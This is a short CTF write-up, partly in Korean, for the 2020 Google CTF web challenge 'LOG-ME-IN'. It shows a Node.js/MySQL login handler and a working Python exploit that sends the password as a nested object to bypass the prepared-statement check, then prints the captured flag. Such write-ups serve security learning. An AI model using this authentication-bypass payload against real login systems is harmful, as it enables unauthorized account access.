2020 Google CTF Web LOG-ME-IN 87pt

LOG-ME-IN

Log in to get the flag

https://log-me-in.web.ctfcompetition.com/

 

username이 michelle이면 flag를 읽을 수 있다.

SQL query를 prepare statement로 실행하지만 u값과 p값을 Array로 전달하게 되면 SQL Injection이 발생하게 된다.

app.use(bodyParser.urlencoded({
  extended: true
}))

.....

app.post('/login', (req, res) => {
  const u = req.body['username'];
  const p = req.body['password'];

  const con = DBCon(); // mysql.createConnection(...).connect()

  const sql = 'Select * from users where username = ? and password = ?';
  con.query(sql, [u, p], function(err, qResult) {
    if(err) {
      res.render('login', {error: `Unknown error: ${err}`});
    } else if(qResult.length) {
      const username = qResult[0]['username'];
      let flag;
      if(username.toLowerCase() == targetUser) {
        flag = flagValue
      } else{
        flag = "<span class=text-danger>Only Michelle's account has the flag</span>";
      }
      req.session.username = username
      req.session.flag = flag
      res.redirect('/me');
    } else {
      res.render('login', {error: "Invalid username or password"})
    }
  });
});

app.get('/flag', csrf, auth, (req, res) => {
  res.render('premium')
});

Exploit Code

from requests import *

url = "https://log-me-in.web.ctfcompetition.com/"
data = "username=michelle&password[password]=1"
header = {"Content-Type":"application/x-www-form-urlencoded"}

res = post(url+"login", data=data, headers=header, allow_redirects=False)
cookie =res.cookies.get_dict()

res = get(url+"flag",cookies=cookie)
print(res.text)

CTF{a-premium-effort-deserves-a-premium-flag}